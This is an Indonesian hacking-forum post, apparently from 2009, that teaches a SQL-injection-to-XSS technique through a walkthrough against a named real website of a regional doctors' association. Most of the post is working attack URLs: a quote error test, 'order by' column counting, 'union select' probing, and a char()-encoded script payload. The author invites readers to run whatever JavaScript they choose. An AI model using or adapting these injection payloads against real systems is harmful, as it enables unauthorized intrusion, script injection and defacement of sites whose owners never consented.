bungaputrilanacita
Jumlah posting : 2 Points : 6 Join date : 07.08.09
| Subyek: XFS~XSS from SQL-i Fri Aug 07, 2009 11:30 am | |
| Begini ceritanya bapak2,. tadi siang, bunga iseng2 ajah maen ke milw0rm,.udah lama bgt gak maen ke site itu,.baca punya baca,. eh,.ketemu bugs sederhana tapi bahaya juga loh,,kata om s'to ajah xss bisa membobol bank,.mantafkan ,.hehehehe,. (^-^) nah ini bugs nya: bugs: XFS (XSS From Sql-i) dekripsi: XFS adalah kalo dilihat dari kepanjangannya yach XSS yang dilakukan dari bugs sql-i. hehehe,.ngerti gak???sama kalo gak,.tapi bunga akan coba menjelaskan sejelas-jelasnya,. r0~f> Error pada website yang terkena bugs sql-i ternyata dapat digunakan untuk menjalankan javascript. pada hal ini kode javascript dijalankan melalui fungi char(), yang nantinya fungsi ini kan menkonversi kode ASCII ke char,.terus inilah yang nantinya akan menjalankan javascript. (^-^) XFS kemungkinan dapat berjalan pada situs yang XXS nya telah di patch,.tetapi hal yang wajib adalah site tsb mempunyai bugs SQL-i. )-l okey bapak2,segitu dulu pembukaannya dari saya,kalo ada yang salah mohon di benarkan dan dimaafkan,karena bunga juga masih belajar . contoh: langkah 1: cari website yang mempunyai sql-i,.(kalo lom paham ttg sql-i baca2 di forum ini dah buanyak bgt yang ngebahas itu) target jatuh pada: http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=2cel vulner: http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=2'dikasih singel quote,jika error page yang keluar maka web tsb kemungkinan bisa. cari no ajaib: setelah di beri singel quote keluar error page,.maka ditambahkan query order by -- http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20order%20by%201--pada order by 1-- angka 1 ditambahkan terus sampe keluar error page lagi,. http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 1-- http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 2-- http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 3-- dst... nah angka terakhir jatuh pada order by 8 -- karena order by 9 -- sudah keluar error pagenya lagi,. lalu kita mencoba mengeluarkan angka ajaib yang kita sebutkan tadi, querynya union select -- http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20union%20select%201,2,3,4,5,6,7,8--nah keluar kan no ajaibnya,.no 2. langkah 2: setelah keluar no ajaib, di situ kita akan menjalankan javascriptnya. Sesuai dengan deskripsi XFS diatas, yang di butuhkan adalah fungsi char(), dimana dalam fungsi ini akan mengkonfersi ASCII ke dalam string. untuk itu dibutuhkan konveter string ke ASCII,. http://www.piclist.com/techref/ascii.htm ->link conveter string ke ASCII setelah membuka link tsb maka kita mengubah string ke ASCII, dalam hal ini bunga mengubah alert('pak dokter web nya anda sakit niy,tolong segra di perbaiki yach, XFS found Bungaputrilanacita') ke dalam ASCII kode. Maka di dapatkan hasil 60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,112,97,107,32,100,111,107,116,101,114,32,119,101,98,32,110,121,97,32,97,110,100,97,32,115,97,107,105,116,32,110,105,121,44,116,111,108,111,110,103,32,115,101,103,114,97,32,100,105,32,112,101,114,98,97,105,107,105,32,121,97,99,104,44,32,88,70,83,32,102,111,117,110,100,32,66,117,110,103,97,112,117,116,114,105,108,97,110,97,99,105,116,97,39,41,60,47,115,99,114,105,112,116,62 langkah 3 : kita tinggal menjalankan saja javascriptnya sesuai deskripsi di atas: susunannya: http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 union select 1,char (ASCII code),3,4,5,6,7,8-- hasilnya: http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20union%20select%201,char%20(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,112,97,107,32,100,111,107,116,101,114,32,119,101,98,32,110,121,97,32,97,110,100,97,32,115,97,107,105,116,32,110,105,121,44,116,111,108,111,110,103,32,115,101,103,114,97,32,100,105,32,112,101,114,98,97,105,107,105,32,121,97,99,104,44,32,88,70,83,32,102,111,117,110,100,32,66,117,110,103,97,112,117,116,114,105,108,97,110,97,99,105,116,97,39,41,60,47,115,99,114,105,112,116,62),3,4,5,6,7,8--nah jalan kan javascriptnya... untuk javascriptnya yang mau di jalankan terserah bapak2 saja..di atas hanya contoh saja,. segitu dulu dari saya, mudah-mudahan dapat dimengerti "Maju IT Indonesia" salam hangat Bungaputrilanacita original post: http://milw0rm.com/papers/363 | |
|